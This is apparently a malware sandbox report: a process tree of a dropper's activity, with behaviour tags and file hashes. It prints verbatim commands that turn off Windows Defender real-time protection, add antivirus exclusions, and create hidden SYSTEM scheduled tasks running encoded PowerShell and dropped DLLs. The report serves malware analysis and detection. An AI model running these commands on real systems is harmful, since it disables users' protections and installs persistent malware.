C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1752 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1856
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1108
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:924 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1596
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:836
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gKBsxBSsp" /SC once /ST 12:36:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gKBsxBSsp"4⤵PID:872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gKBsxBSsp"4⤵PID:1496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bphDoRVzdNCiekKFew" /SC once /ST 15:19:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\fhBFpVnggPzMPeStb\xsCWXNnuAyatQwy\iOiQwnd.exe\" zP /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1056
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {58992010-31A6-4CDA-A8A7-0267C44A2469} S-1-5-21-3406023954-474543476-3319432036-1000:VUIIVLGQ\Admin:Interactive:[1]1⤵PID:1276
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1176
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1720 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:560
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:852 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1552
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1932
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1640
-
C:\Windows\system32\taskeng.exetaskeng.exe {EA31FA8F-A429-48DB-AE41-01B0FE2A7D81} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1548
-
C:\Users\Admin\AppData\Local\Temp\fhBFpVnggPzMPeStb\xsCWXNnuAyatQwy\iOiQwnd.exeC:\Users\Admin\AppData\Local\Temp\fhBFpVnggPzMPeStb\xsCWXNnuAyatQwy\iOiQwnd.exe zP /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1736 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSOTLboVN" /SC once /ST 09:51:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSOTLboVN"3⤵PID:1576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSOTLboVN"3⤵PID:1640
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1268
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:576
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:584
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJSNtDtrr" /SC once /ST 12:48:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJSNtDtrr"3⤵PID:1056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJSNtDtrr"3⤵PID:1084
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqDcXDIcivQcLfhF" /t REG_DWORD /d 0 /reg:323⤵PID:1620
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqDcXDIcivQcLfhF" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqDcXDIcivQcLfhF" /t REG_DWORD /d 0 /reg:643⤵PID:1112
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqDcXDIcivQcLfhF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqDcXDIcivQcLfhF" /t REG_DWORD /d 0 /reg:323⤵PID:900
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqDcXDIcivQcLfhF" /t REG_DWORD /d 0 /reg:324⤵PID:588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqDcXDIcivQcLfhF" /t REG_DWORD /d 0 /reg:643⤵PID:1672
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqDcXDIcivQcLfhF" /t REG_DWORD /d 0 /reg:644⤵PID:672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\DqDcXDIcivQcLfhF\GPcFeMlE\lZDRnSnWOHsYLfXo.wsf"3⤵PID:1656
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\DqDcXDIcivQcLfhF\GPcFeMlE\lZDRnSnWOHsYLfXo.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1108 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dQuCWKvYVGrEzExAWxR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dQuCWKvYVGrEzExAWxR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gHzIMIkcU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gHzIMIkcU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lGfNIDOyAPeU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lGfNIDOyAPeU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xdyFYuQYPTUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xdyFYuQYPTUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zEEsyDgAqHSfC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zEEsyDgAqHSfC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LPkuZQFwFEsJqCVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LPkuZQFwFEsJqCVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\fhBFpVnggPzMPeStb" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\fhBFpVnggPzMPeStb" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqDcXDIcivQcLfhF" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqDcXDIcivQcLfhF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dQuCWKvYVGrEzExAWxR" /t REG_DWORD /d 0 /reg:324⤵PID:1696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dQuCWKvYVGrEzExAWxR" /t REG_DWORD /d 0 /reg:644⤵PID:284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gHzIMIkcU" /t REG_DWORD /d 0 /reg:324⤵PID:1740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gHzIMIkcU" /t REG_DWORD /d 0 /reg:644⤵PID:1940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lGfNIDOyAPeU2" /t REG_DWORD /d 0 /reg:324⤵PID:1552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lGfNIDOyAPeU2" /t REG_DWORD /d 0 /reg:644⤵PID:988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xdyFYuQYPTUn" /t REG_DWORD /d 0 /reg:324⤵PID:1948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xdyFYuQYPTUn" /t REG_DWORD /d 0 /reg:644⤵PID:1316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zEEsyDgAqHSfC" /t REG_DWORD /d 0 /reg:324⤵PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zEEsyDgAqHSfC" /t REG_DWORD /d 0 /reg:644⤵PID:1784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LPkuZQFwFEsJqCVB" /t REG_DWORD /d 0 /reg:324⤵PID:560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LPkuZQFwFEsJqCVB" /t REG_DWORD /d 0 /reg:644⤵PID:1540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\fhBFpVnggPzMPeStb" /t REG_DWORD /d 0 /reg:324⤵PID:1496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\fhBFpVnggPzMPeStb" /t REG_DWORD /d 0 /reg:644⤵PID:1672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqDcXDIcivQcLfhF" /t REG_DWORD /d 0 /reg:324⤵PID:1136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqDcXDIcivQcLfhF" /t REG_DWORD /d 0 /reg:644⤵PID:1224
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gWunKicUZ" /SC once /ST 05:12:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gWunKicUZ"3⤵PID:360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gWunKicUZ"3⤵PID:1492
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:112
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:316
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1176
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "akiZFTTexhjRSqPeU" /SC once /ST 09:23:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\DqDcXDIcivQcLfhF\uiQBYPTKZTjXTjV\wnwOpin.exe\" K7 /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "akiZFTTexhjRSqPeU"3⤵PID:588
-
-
-
C:\Windows\Temp\DqDcXDIcivQcLfhF\uiQBYPTKZTjXTjV\wnwOpin.exeC:\Windows\Temp\DqDcXDIcivQcLfhF\uiQBYPTKZTjXTjV\wnwOpin.exe K7 /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1496 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bphDoRVzdNCiekKFew"3⤵PID:1252
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1912
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1224
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:800
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\gHzIMIkcU\LDSkXR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "faLKMYTVtmmDTPg" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "faLKMYTVtmmDTPg2" /F /xml "C:\Program Files (x86)\gHzIMIkcU\MrkFykk.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "faLKMYTVtmmDTPg"3⤵PID:1996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "faLKMYTVtmmDTPg"3⤵PID:1316
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dtFNaLTWxGepdU" /F /xml "C:\Program Files (x86)\lGfNIDOyAPeU2\dVLQtDP.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rXTxCKzNTkVUE2" /F /xml "C:\ProgramData\LPkuZQFwFEsJqCVB\STuhixn.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "svsVeKycpBbxgknde2" /F /xml "C:\Program Files (x86)\dQuCWKvYVGrEzExAWxR\pWeFFbl.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1492
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nblJZCHfHIuGGtwMCeQ2" /F /xml "C:\Program Files (x86)\zEEsyDgAqHSfC\qXJWkJt.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QdMLWSarZZCSOkoUG" /SC once /ST 12:13:23 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\DqDcXDIcivQcLfhF\reXgpRFi\clrvmOy.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QdMLWSarZZCSOkoUG"3⤵PID:1540
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:2012
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1696
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1720
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "akiZFTTexhjRSqPeU"3⤵PID:872
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\DqDcXDIcivQcLfhF\reXgpRFi\clrvmOy.dll",#1 /site_id 5254032⤵PID:576
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\DqDcXDIcivQcLfhF\reXgpRFi\clrvmOy.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1956 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QdMLWSarZZCSOkoUG"4⤵PID:1572
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2020
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1968
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1992
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d5da73431caf9aeebb19c601882fde27
SHA1072e1619857569b5e7e6c071f9b76dba126f33f0
SHA25684502fe0acb0ed4ac4c9e261e9e247da0a1cc9a50f5bc91cdce74f4366d22fc8
SHA5124962544ba3813ebe6243c0bfc4f4a3ea30d8b3740528a8656d76cfc44d659fe98acae372edc6a45a8332ccc88dd9522a8b3be045923db9c8ad0fae0b394652d3
-
Filesize
2KB
MD54cfab9ee02fb47e315526606579a7c30
SHA14def0d59e071b70e832ae1b45aa03187e7f9ff06
SHA256291ca89e4e16c28a6f7d7cf68d88b5eac2e41ec82d8cecae2d939854085a333b
SHA5123eb8b94e88623d8fa357dc9930821683df0ef443aeef95802d2579ce600bba402a123b0f608d5f47f69ee7f07e61650b340f7f7f68a81ee28cd882a58c20e25f
-
Filesize
2KB
